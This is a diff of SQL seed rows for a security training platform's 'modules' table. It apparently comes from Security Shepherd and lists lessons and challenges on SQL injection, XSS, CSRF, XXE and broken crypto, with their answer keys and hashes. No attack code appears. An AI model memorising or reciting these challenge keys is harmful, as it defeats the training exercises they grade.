-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('b3cfd5890649e6815a1c7107cc41d17c82826cfa', 'Insecure Cryptographic Storage Challenge 3',
-        'insecure.cryptographic.storage.challenge.3', 'challenge', 'Insecure Cryptographic Storage',
-        'insecure.cryptographic.storage', 'THISISTHESECURITYSHEPHERDABCENCRYPTIONKEY',
-        '2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1', 'open', '148', '75', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('63bc4811a2e72a7c833962e5d47a41251cd90de3', 'Broken Crypto 2', 'broken.crypto.2', 'challenge',
-        'Mobile Broken Crypto', 'mobile.broken.crypto', 'DancingRobotChilliSauce',
-        'fb5c9ce0f5539b737e534fd317befff7427f6610ed626dfd43abf35295f106bc', 'open', '149', '75', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('e635fce334aa61fdaa459c21c286d6332eddcdd3', 'Client Side Injection 2', 'client.side.injection.2', 'challenge',
-        'Mobile Injection', 'mobile.injection', 'BurpingChimneys',
-        'cfe68711def42bb0b201467b859322dd2750f633246842280dc68c858d208425', 'open', '155', '80', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('0a37cb9296ff3763f7f3a45ff313bce47afa9384', 'CSRF 5', 'csrf.5', 'challenge', 'CSRF', 'csrf',
-        '8f34078ef3e53f619618d9def1ede8a6a9117c77c2fad22f76bba633da83e6d4',
-        '70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49', 'open', '156', '80', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('3b14ca3c8f9b90c9b2c8cd1fba9fa67add1272a3', 'Poor Data Validation 2', 'poor.data.validation.2', 'challenge',
-        'Poor Data Validation', 'poor.data.validation',
-        '05adf1e4afeb5550faf7edbec99170b40e79168ecb3a5da19943f05a3fe08c8e',
-        '20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5', 'open', '157', '80', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('ba6e65e4881c8499b5e53eb33b5be6b5d0f1fb2c', 'Poor Authentication 1', 'poor.authentication.1', 'challenge',
-        'Mobile Poor Authentication', 'mobile.poor.authentication', 'MegaKillerExtremeCheese',
-        'efa08298fc6a4add4b9a4bbdbbbb18ac934667971fa275bd7d234589bd8a8467', 'open', '160', '60', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('c7ac1e05faa2d4b1016cfcc726e0689419662784', 'Failure to Restrict URL Access 2',
-        'failure.to.restrict.url.access.2', 'challenge', 'Failure to Restrict URL Access',
-        'failure.to.restrict.url.access', '40b675e3d404c52b36abe31d05842b283975ec62e8',
-        '278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa', 'open', '165', '85', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('fccf8e4d5372ee5a73af5f862dc810545d19b176', 'Cross Site Scripting 5', 'cross.site.scripting.5', 'challenge',
-        'XSS', 'xss', '7d7cc278c30cca985ab027e9f9e09e2f759e5a3d1f63293',
-        'f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671', 'open', '166', '85', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('064e28ea4b2f7708b8cb4495d9db1a5e05decdb8', 'Poor Authentication 2', 'poor.authentication.2', 'challenge',
-        'Mobile Poor Authentication', 'mobile.poor.authentication', 'MoreRobotsNotEnoughNuts',
-        '808d8372ec7bc7e37e8e3b30d313cb47763926065a4623b27b24cc537fee72a7', 'open', '173', '70', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('a84bbf8737a9ca749d81d5226fc87e0c828138ee', 'SQL Injection 5', 'sql.injection.5', 'challenge', 'Injection',
-        'injection', '343f2e424d5d7a2eff7f9ee5a5a72fd97d5a19ef7bff3ef2953e033ea32dd7ee',
-        '8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62', 'open', '175', '90', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('04a5bd8656fdeceac26e21ef6b04b90eaafbd7d5', 'CSRF 6', 'csrf.6', 'challenge', 'CSRF', 'csrf',
-        'df611f54325786d42e6deae8bbd0b9d21cf2c9282ec6de4e04166abe2792ac00',
-        '2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569', 'open', '176', '90', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('dc89383763c68cba0aaa1c6f3fd4c17e9d49a805', 'SQL Injection Stored Procedure', 'sql.injection.stored.procedure',
-        'challenge', 'Injection', 'injection', 'd9c5757c1c086d02d491cbe46a941ecde5a65d523de36ac1bfed8dd4dd9994c8',
-        '7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7', 'open', '177', '90', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('6a411618a05e3cef8ccb6f3d7914412d27782a88', 'Content Provider Leakage 1', 'content.provider.leakage.1',
-        'challenge', 'Mobile Content Provider', 'mobile.content.provider', 'BlueCupNoPartySorry',
-        '2a845ec1943a6342956a48cdc8ca60f40036b68a810109d0b9d2a35271377980', 'open', '178', '75', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('3b1af0ad239325bf494c6e606585320b31612e72', 'Broken Crypto 3', 'broken.crypto.3', 'challenge',
-        'Mobile Broken Crypto', 'mobile.broken.crypto', 'ShaveTheSkies',
-        'f5a3f19dd44b53c6d29dda65fa90791bb312a3044b3110acb8a65d165376bf34', 'open', '180', '180', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('c6841bcc326c4bad3a23cd4fa6391eb9bdb146ed', 'Cross Site Scripting 6', 'cross.site.scripting.6', 'challenge',
-        'XSS', 'xss', 'c13e42171dbd41a7020852ffdd3399b63a87f5',
-        'd330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf', 'open', '185', '95', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('ad332a32a6af1f005f9c8d1e98db264eb2ae5dfe', 'SQL Injection 6', 'sql.injection.6', 'challenge', 'Injection',
-        'injection', '17f999a8b3fbfde54124d6e94b256a264652e5087b14622e1644c884f8a33f82',
-        'd0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2', 'open', '186', '95', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('ed732e695b85baca21d80966306a9ab5ec37477f', 'Session Management Challenge 5', 'session.management.challenge.5',
-        'challenge', 'Session Management', 'session.management', 'a15b8ea0b8a3374a1dedc326dfbe3dbae26',
-        '7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1', 'open', '205', '110', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('adc845f9624716eefabcc90d172bab4096fa2ac4', 'Failure to Restrict URL Access 3',
-        'failure.to.restrict.url.access.3', 'challenge', 'Failure to Restrict URL Access',
-        'failure.to.restrict.url.access', '8c1dbfdc7cad35a116535f76f21e448c6c7c0ebc395be2be80e5690e01adec18',
-        'e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4', 'open', '206', '110', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('9294ba32bdbd680e3260a0315cd98bf6ce8b69bd', 'Session Management Challenge 6', 'session.management.challenge.6',
-        'challenge', 'Session Management', 'session.management',
-        'bb0eb566322d6b1f1dff388f5eee9929f6f1f9f5cac9eed266ef6e5053fe08e6',
-        'b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece', 'open', '207', '110', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('6158a695f20f9286d5f12ff3f4d42678f4a9740c', 'Security Misconfig Cookie Flag', 'security.misconfig.cookie.flag',
-        'challenge', 'Security Misconfigurations', 'security.misconfigurations',
-        '92755de2ebb012e689caf8bfec629b1e237d23438427499b6bf0d7933f1b8215',
-        'c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4', 'open', '208', '110', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('368491877a0318e9a774ba5d648c33cb0165ba1e', 'Session Management Challenge 7', 'session.management.challenge.7',
-        'challenge', 'Session Management', 'session.management',
-        '9042eeaa8455f71deea31a5a32ae51e71477b1581c3612972902206ac51bb621',
-        '269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80', 'open', '209', '110', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('64070f5aec0593962a29a141110b9239d73cd7b3', 'SQL Injection 7', 'sql.injection.7', 'challenge', 'Injection',
-        'injection', '4637cae3d9b961fdff880d6d5ce4f69e91fe23db0aae7dcd4038e20ed8a287dc',
-        '8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced', 'open', '210', '110', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('145111e80400e4fd48bd3aa5aca382e9c5640793', 'Insecure Cryptographic Storage Challenge 4',
-        'insecure.cryptographic.storage.challenge.4', 'challenge', 'Insecure Cryptographic Storage',
-        'insecure.cryptographic.storage', '50980917266ce6ec07471f49b1a046ca6a5034eb9261fb44c3ffc4b16931191c',
-        'b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9', 'open', '211', '115', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('7153290d128cfdef5f40742dbaeb129a36ac2340', 'Session Management Challenge 8', 'session.management.challenge.8',
-        'challenge', 'Session Management', 'session.management',
-        '11d84b0ad628bb6e99e0640ff1791a29a1938609829ef5bdccee92b2bccd2bcd',
-        '714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334', 'open', '215', '115', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('853c98bd070fe0d31f1ec8b4f2ada9d7fd1784c5', 'CSRF 7', 'csrf.7', 'challenge', 'CSRF', 'csrf',
-        '849e1efbb0c1e870d17d32a3e1b18a8836514619146521fbec6623fce67b73e8',
-        '7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3', 'open', '235', '120', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('f02ce6bcd0a822d245433533997eaf44379065f4', 'Insecure Cryptographic Storage Home Made Key',
-        'insecure.cryptographic.storage.home.made.key', 'challenge', 'Insecure Cryptographic Storage',
-        'insecure.cryptographic.storage', '59A8D9A8020C61B3D76A600F94AJCECEABEDD44DF26874BD070BD07D',
-        '9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4', 'open', '240', '140', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('df2ac757cc135dcb8ce5ea01f677c74f04b446d6', 'XXE Injection', 'xxe.lessons', 'lesson', 'Injection', 'injection',
-        'c8c232cd8e3abdfea3fcef24379415a65e00ac197af09e82602e231aa3031879',
-        '57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a', 'closed', '55', '30', 1, 1);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae', 'XXE Injection 1', 'xxe.injection.1', 'challenge', 'Injection',
-        'injection', '1016d6dce9f715e9eab4f3a884b3b316cfbba8fb4023c19f34c62bd936d5695b',
-        'ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e', 'closed', '89', '45', 1, 1);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('0dbea4cb5811fff0527184f99bd5034ca9286f11', 'Insecure Direct Object References', 'insecure.direct.object.references', 'lesson', 'Insecure Direct Object References', 'insecure.direct.object.references', '59e571b1e59441e76e0c85e5b49', 'fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100', 'open', '5', '10', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('b9d82aa7b46ddaddb6acfe470452a8362136a31e', 'Poor Data Validation', 'poor.data.validation', 'lesson', 'Poor Data Validation', 'poor.data.validation', '6680b08b175c9f3d521764b41349fcbd3c0ad0a76655a10d42372ebccdfdb4bb', '4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f', 'open', '6', '10', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('bf847c4a8153d487d6ec36f4fca9b77749597c64', 'Security Misconfiguration', 'security.misconfiguration', 'lesson', 'Security Misconfigurations', 'security.misconfigurations', '55b34717d014a5a355f6eced4386878fab0b2793e1d1dbfd23e6262cd510ea96', 'fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833', 'open', '7', '10', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('9533e21e285621a676bec58fc089065dec1f59f5', 'Broken Session Management', 'broken.session.management', 'lesson', 'Session Management', 'session.management', '6594dec9ff7c4e60d9f8945ca0d4', 'b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806', 'open', '16', '10', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a', 'Failure to Restrict URL Access', 'failure.to.restrict.url.access', 'lesson', 'Failure to Restrict URL Access', 'failure.to.restrict.url.access', 'f60d1337ac4d35cb67880a3adda79', 'oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3', 'open', '25', '15', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('ca8233e0398ecfa76f9e05a49d49f4a7ba390d07', 'Cross Site Scripting', 'cross.site.scripting', 'lesson', 'XSS', 'xss', 'ea7b563b2935d8587539d747d', 'zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a', 'open', '26', '15', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('cd7f70faed73d2457219b951e714ebe5775515d8', 'Cross Site Scripting 1', 'cross.site.scripting.1', 'challenge', 'XSS', 'xss', '445d0db4a8fc5d4acb164d022b', 'd72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa', 'open', '35', '20', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('53a53a66cb3bf3e4c665c442425ca90e29536edd', 'Insecure Data Storage', 'insecure.data.storage', 'lesson', 'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'Battery777', 'ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f', 'open', '45', '25', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('201ae6f8c55ba3f3b5881806387fbf34b15c30c2', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', 'lesson', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', 'base64isNotEncryptionBase64isEncodingBase64HidesNothingFromYou', 'if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2', 'open', '46', '25', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('408610f220b4f71f7261207a17055acbffb8a747', 'SQL Injection', 'sql.injection', 'lesson', 'Injection', 'injection', '3c17f6bf34080979e0cebda5672e989c07ceec9fa4ee7b7c17c9e3ce26bc63e0', 'e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594', 'open', '55', '30', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('891a0208a95f1791287be721a4b851d4c584880a', 'Insecure Cryptographic Storage Challenge 1', 'insecure.cryptographic.storage.challenge.1', 'challenge', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', 'mylovelyhorserunningthroughthefieldwhereareyougoingwithyourbiga', 'x9c408d23e75ec92495e0caf9a544edb2ee8f624249f3e920663edb733f15cd7', 'open', '65', '35', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4', 'Insecure Direct Object Reference Challenge 1', 'insecure.direct.object.reference.challenge.1', 'challenge', 'Insecure Direct Object References', 'insecure.direct.object.references', 'dd6301b38b5ad9c54b85d07c087aebec89df8b8c769d4da084a55663e6186742', 'o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c', 'open', '66', '35', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('6be5de81223cc1b38b6e427cc44f8b6a28d2bc96', 'Poor Data Validation 1', 'poor.data.validation.1', 'challenge', 'Poor Data Validation', 'poor.data.validation', 'd30475881612685092e5ec469317dcc5ccc1f548a97bfdb041236b5bba7627bf', 'ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e', 'open', '67', '35', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('544aa22d3dd16a8232b093848a6523b0712b23da', 'SQL Injection 1', 'sql.injection.1', 'challenge', 'Injection', 'injection', 'fd8e9a29dab791197115b58061b215594211e72c1680f1eacc50b0394133a09f', 'e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a', 'open', '68', '35', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('2ab09c0c18470ae5f87d219d019a1f603e66f944', 'Reverse Engineering', 'reverse.engineering', 'lesson', 'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'DrumaDrumaDrumBoomBoom', '19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9', 'open', '75', '40', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d', 'Session Management Challenge 1', 'session.management.challenge.1', 'challenge', 'Session Management', 'session.management', 'db7b1da5d7a43c7100a6f01bb0c', 'dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a', 'open', '75', '40', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('3d5b46abc6865ba09aaff98a8278a5f5e339abff', 'Failure to Restrict URL Access 1', 'failure.to.restrict.url.access.1', 'challenge', 'Failure to Restrict URL Access', 'failure.to.restrict.url.access', 'c776572b6a9d5b5c6e4aa672a4771213', '4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99', 'open', '76', '40', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('1506f22cd73d14d8a73e0ee32006f35d4f234799', 'Unintended Data Leakage', 'unintended.data.leakage', 'lesson', 'Mobile Data Leakage', 'mobile.data.leakage', 'SilentButSteadyRedLed', '392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec', 'open', '77', '40', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('453d22238401e0bf6f1ff5d45996407e98e45b07', 'Cross Site Request Forgery', 'cross.site.request.forgery', 'lesson', 'CSRF', 'csrf', '666980771c29857b8a84c686751ce7edaae3d6ac1', 'ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7', 'open', '78', '40', 0, 0);
